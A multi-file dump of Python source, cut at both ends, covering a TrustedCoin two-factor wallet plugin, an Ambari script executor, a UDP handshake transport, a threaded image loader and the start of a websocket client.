change_addr: str = None,
is_sweep=False,
rbf=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr, rbf=rbf)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
                # TrustedCoin won't charge if the total input value is
                # lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
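        # "70736274ff" is the hex encoding of the PSBT magic bytes b"psbt\xff"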
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return avian.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return avian.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
seed_type = '2fa' if self.config.get('nosegwit') else '2fa_segwit'
self.create_seed(wizard, seed_type)
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.opt_bip39 = False
wizard.opt_ext = True
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if t == '2fa':
if n >= 20: # old scheme
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif n == 12: # new scheme
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unrecognized seed length for "2fa" seed: {n}')
elif t == '2fa_segwit':
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unexpected seed type: {t}')
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate(aborted=True)
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate(aborted=True)
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate(aborted=True)
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
import platform
from threading import Thread
import time
from BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.os_check import OSConst, OSCheck
from Grep import Grep
import sys
from ambari_commons import shell
from ambari_commons.shell import shellRunner
logger = logging.getLogger()
class PythonExecutor:
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
  used as a singleton for concurrent execution of python scripts
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def open_subprocess_files(self, tmpoutfile, tmperrfile, override_output_files):
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
return tmpout, tmperr
def run_file(self, script, script_params, tmp_dir, tmpoutfile, tmperrfile,
timeout, tmpstructedoutfile, logger_level, callback, task_id,
override_output_files = True, handle = None, log_info_on_failure=True):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended.
The structured out file, however, is preserved during multiple invocations that use the same file.
"""
script_params += [tmpstructedoutfile, logger_level, tmp_dir]
pythonCommand = self.python_command(script, script_params)
logger.debug("Running command " + pprint.pformat(pythonCommand))
if handle is None:
tmpout, tmperr = self.open_subprocess_files(tmpoutfile, tmperrfile, override_output_files)
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
# map task_id to pid
callback(task_id, process.pid)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
result = self.prepare_process_result(process, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=timeout)
if log_info_on_failure and result['exitcode']:
self.on_failure(pythonCommand, result)
return result
else:
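      # Background execution: hand the command off to a BackgroundThread and return
      # immediately; 777 acts as a placeholder exit code while the command is still running.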
holder = Holder(pythonCommand, tmpoutfile, tmperrfile, tmpstructedoutfile, handle)
background = BackgroundThread(holder, self)
background.start()
return {"exitcode": 777}
def on_failure(self, pythonCommand, result):
"""
Log some useful information after task failure.
"""
logger.info("Command " + pprint.pformat(pythonCommand) + " failed with exitcode=" + str(result['exitcode']))
cmd_list = ["ps faux", "netstat -tulpn"]
shell_runner = shellRunner()
for cmd in cmd_list:
ret = shell_runner.run(cmd)
logger.info("Command '{0}' returned {1}. {2}{3}".format(cmd, ret["exitCode"], ret["error"], ret["output"]))
def prepare_process_result(self, process, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=None):
out, error, structured_out = self.read_result_from_files(tmpoutfile, tmperrfile, tmpstructedoutfile)
# Building results
returncode = process.returncode
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout" + \
(" after waiting %s secs" % str(timeout) if timeout else "")
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.debug("Result: %s" % result)
return result
def read_result_from_files(self, out_path, err_path, structured_out_path):
out = open(out_path, 'r').read()
error = open(err_path, 'r').read()
try:
with open(structured_out_path, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(structured_out_path):
errMsg = 'Unable to read structured output from ' + structured_out_path
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
return out, error, structured_out
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
    Creates a subprocess with the given parameters. This functionality was moved to a
    separate method to make unit testing possible
"""
close_fds = None if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY else True
if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY:
command_env = dict(os.environ)
command_env["PYTHONPATH"] = os.pathsep.join(sys.path)
for k, v in command_env.iteritems():
command_env[k] = str(v)
else:
command_env = None
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=command_env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
    # we need to manually pass the python executable on windows because sys.executable will return the service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
"exitcode": retcode,
"stdout": grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
class Holder:
def __init__(self, command, out_file, err_file, structured_out_file, handle):
self.command = command
self.out_file = out_file
self.err_file = err_file
self.structured_out_file = structured_out_file
self.handle = handle
class BackgroundThread(threading.Thread):
def __init__(self, holder, pythonExecutor):
threading.Thread.__init__(self)
self.holder = holder
self.pythonExecutor = pythonExecutor
def run(self):
process_out, process_err = self.pythonExecutor.open_subprocess_files(self.holder.out_file, self.holder.err_file, True)
logger.debug("Starting process command %s" % self.holder.command)
process = self.pythonExecutor.launch_python_subprocess(self.holder.command, process_out, process_err)
logger.debug("Process has been started. Pid = %s" % process.pid)
self.holder.handle.pid = process.pid
self.holder.handle.status = BackgroundCommandExecutionHandle.RUNNING_STATUS
self.holder.handle.on_background_command_started(self.holder.handle.command['taskId'], process.pid)
process.communicate()
self.holder.handle.exitCode = process.returncode
process_condensed_result = self.pythonExecutor.prepare_process_result(process, self.holder.out_file, self.holder.err_file, self.holder.structured_out_file)
logger.debug("Calling callback with args %s" % process_condensed_result)
self.holder.handle.on_background_command_complete_callback(process_condensed_result, self.holder.handle)
logger.debug("Exiting from thread for holder pid %s" % self.holder.handle.pid)
|
UdpController.py
|
import logging
import time
import socket
import threading
import ipaddress
from Packet import *
from packetConstructor import *
from const import *
from Window import *
import sys
class UdpController:
__conn = None
__routerAddr = None
__packetBuilder = None
def __init__(self):
pass
def connectServer(self):
"""
Three-way handshake
"""
logging.info("[Transport] Connecting to {}:{}.".format(SERVER_IP, SERVER_PORT))
self.__routerAddr = (ROUTER_IP, ROUTER_PORT)
peer_ip = ipaddress.ip_address(socket.gethostbyname(SERVER_IP))
self.__packetBuilder = PacketConstructor(peer_ip, SERVER_PORT)
self.__conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# Send SYN
p = self.__packetBuilder.build(PACKET_TYPE_SYN)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
self.__conn.settimeout(ALIVE)
logging.debug('[Transport] Client Waiting for a response from the server.')
# Expecting SYN_ACK
response, sender = self.__conn.recvfrom(PACKET_SIZE)
p = Packet.from_bytes(response)
logging.info("[Transport] Server connection established.")
except socket.timeout:
print("[Transport] Connecting timeout.")
self.__conn.close()
sys.exit(0)
if p.packet_type == PACKET_TYPE_SYN_AK:
# Send ACK
p = self.__packetBuilder.build(PACKET_TYPE_AK)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
# No need to timeout, we know server is ready
return True
else:
print("[Transport] Unexpected packet: {}".format(p))
self.__conn.close()
sys.exit(0)
def connectClient(self):
"""
Three-way handshake
"""
# self.__routerAddr = (ROUTER_IP,ROUTER_PORT)
self.__conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.__conn.bind(('', SERVER_PORT))
logging.info("[Transport] Server is listening at {}:{}.".format(SERVER_IP, SERVER_PORT))
packet = self.getPacket(ALIVE)
if packet is None:
print("[Transport] Connecting timeout.")
# TODO confirm timeout
return False
# if pkt type is syn, send ack syn, if already acked, return true
if packet.packet_type == PACKET_TYPE_SYN:
# addr = (packet.peer_ip_addr, packet.peer_port)
packet.packet_type = PACKET_TYPE_SYN_AK
self.__conn.sendto(packet.to_bytes(), self.__routerAddr)
# we can simply ignore the incoming ACK: it could be lost, and the sender does not handle that case anyway,
# but we should be careful with the first packet when receiving the HTTP request
logging.info("[Transport] Client connection established.")
return True
return False
def sendMessage(self, message):
window = Window()
window.createSenderWindow(message)
threading.Thread(target=self.senderListener, args=(window,)).start()
while window.hasPendingPacket(): # Not all packets have been sent
# Get next sendable packets if there is any in WINDOW
for frame in window.getFrames():
p = self.__packetBuilder.build(PACKET_TYPE_DATA, frame.seq_num, frame.payload)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
logging.debug("[Transport] Send Message: {}".format(p.payload))
frame.timer = time.time()
frame.send = True
def senderListener(self, window):
"""
Listen for ACK responses from the server
"""
while window.hasPendingPacket():
# Find packets that have been sent but have not been ACKed
# Then, check their timer
try:
self.__conn.settimeout(TIME_OUT)
response, sender = self.__conn.recvfrom(PACKET_SIZE)
p = Packet.from_bytes(response)
logging.debug('[Transport] Received response: {}: {}'.format(p, p.payload.decode("utf-8")))
if p.packet_type == PACKET_TYPE_AK:
window.updateWindow(p.seq_num)
except socket.timeout:
logging.debug("[Transport] Timeout when wait ACK.")
for i in range(window.pointer, window.pointer + WINDOW_SIZE):
if i >= len(window.frames):
break
f = window.frames[i]
if f.send and not f.ACK:
# reset send status, so it can be re-sent
f.send = False
logging.debug('[Transport] Listener reaches the end!')
def receiveMessage(self):
window = Window()
window.createReceiverWindow()
while not window.finished():
# TODO if None, raise error
p = self.getPacket(TIME_OUT_FOR_RECEIVE)
if p is None:
logging.debug("[Transport] No message received in timeout time")
return None
# discard possible packet from handshake
if p.packet_type == PACKET_TYPE_AK and p.seq_num == 0:
continue
window.process(p)
# send ACK
p.packet_type = PACKET_TYPE_AK
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
data = self.retrieveData(window)
return data
# return data (bytes)
def retrieveData(self, window):
data = b''
for f in window.frames:
data = data + f.payload
return data
def getPacket(self, timeout):
self.__conn.settimeout(timeout)
try:
data, addr = self.__conn.recvfrom(PACKET_SIZE)
pkt = Packet.from_bytes(data)
logging.debug("[Transport] Received: {}:{}".format(pkt,pkt.payload))
self.__routerAddr = addr
if self.__packetBuilder is None:
self.__packetBuilder = PacketConstructor(pkt.peer_ip_addr, pkt.peer_port)
return pkt
except socket.timeout:
logging.debug('[Transport] Time out when recvfrom message!')
return None
def dis_connect(self):
"""
Disconnecting: FIN, ACK, FIN, ACK
"""
logging.info("Disconnecting.")
self.__conn.close()
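# A simplified, self-contained sketch of the three-way handshake implemented by
# connectServer()/connectClient() above, using plain UDP sockets and string tokens
# instead of the project's Packet/PacketConstructor classes. The host/port below are
# illustrative assumptions, not the project's ROUTER_IP/ROUTER_PORT constants.
def handshake_client(server_addr=("127.0.0.1", 9999), timeout=2.0):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(b"SYN", server_addr)       # step 1: SYN
        data, _ = sock.recvfrom(1024)          # step 2: expect SYN-ACK
        if data == b"SYN-ACK":
            sock.sendto(b"ACK", server_addr)   # step 3: ACK, connection considered established
            return True
        return False
    except socket.timeout:
        return False
    finally:
        sock.close()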
|
ReadData.py
|
from DataUtils import *
import threading, cv2, sys, time
import numpy as np
import pandas as pd
class ReadData():
def __init__(self, dsName='airsim', subType='mr', seq=0):
self.dsName = dsName
self.subType = subType
self.path = getPath(dsName, seq=seq, subType=subType)
if dsName == 'airsim':
self.data = pd.read_csv(self.path + 'data.txt', sep=' ', header=None)
self.time_stamp = self.data.iloc[:, 0].values
else:
self.time_stamp = None
# images
self.imgNames = getImgNames(self.path, dsName, ts=self.time_stamp, subType=subType)
print(self.imgNames)
self.numImgs = len(self.imgNames)
self.numChannel = 3 if self.dsName != 'euroc' else 1
self.imgs = np.zeros((self.numImgs, self.numChannel, 360, 720), dtype=np.float32)
self.getImages()
def getNewImgNames(self, subtype='bar'):
return getImgNames(self.path, self.dsName, self.time_stamp, subType=subtype)
def getImgsFromTo(self, start, N):
if start > self.numImgs:
sys.exit('ReadData-getImgsFromTo: start index exceeds the number of images')
end, N = getEnd(start, N, self.numImgs)
print('ReadData-getImgsFromTo: reading imgs from %d to %d' % (start, end))
for i in range(start, end):
fName = self.imgNames[i]
if self.dsName == 'euroc':
img = cv2.imread(fName, 0) / 255.0
else:
img = cv2.imread(fName) / 255.0
if self.dsName != 'airsim':
img = cv2.resize(img, (720, 360))
img = np.reshape(img.astype(np.float32), (-1, self.numChannel, 360, 720))
self.imgs[i, :] = img # no lock is necessary
print('ReadData-getImgsFromTo: done reading imgs from %d to %d' % (start, end))
def getImages(self):
partN = 500
nThread = int(self.numImgs / partN) + 1
print('# of thread reading imgs: %d' % (nThread))
threads = []
for i in range(0, nThread):
start = i * partN
threads.append(threading.Thread(target=self.getImgsFromTo, args=(start, partN)))
threads[i].start()
for thread in threads:
thread.join()  # wait until this thread finishes (costs a little extra time)
if __name__ == '__main__':
ReadData(dsName='airsim', subType='mr', seq=2)
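# A minimal, self-contained sketch of the chunked multi-threaded loading pattern used by
# getImages()/getImgsFromTo() above: split the index range into fixed-size chunks, read
# each chunk in its own thread, and write results into a preallocated array. The names
# below are illustrative and are not part of DataUtils.
def load_in_chunks(loader, total, chunk=500):
    out = np.zeros(total, dtype=np.float32)      # preallocated shared buffer

    def worker(start):
        end = min(start + chunk, total)
        for i in range(start, end):
            out[i] = loader(i)                   # each index is written by exactly one thread

    threads = [threading.Thread(target=worker, args=(s,)) for s in range(0, total, chunk)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return out

# Example: load_in_chunks(lambda i: float(i) ** 0.5, total=1200, chunk=500)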
|
websocket_client.py
|
import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from vnpy.trader.utility import get_file_logger
class WebsocketClient(object):
"""
Websocket API
After creating the client object, use start() to run the worker and ping threads.
The worker thread connects the websocket automatically.
Use stop() to stop the threads and disconnect the websocket before destroying the client
object (especially when exiting the program).
Default serialization format is json.
Callbacks to override:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping the server every ping_interval seconds (60 by default).
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
self.logger: Optional[logging.Logger] = None
# For debugging
self._last_sent_text = None
self._last_received_text = None
def init(self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
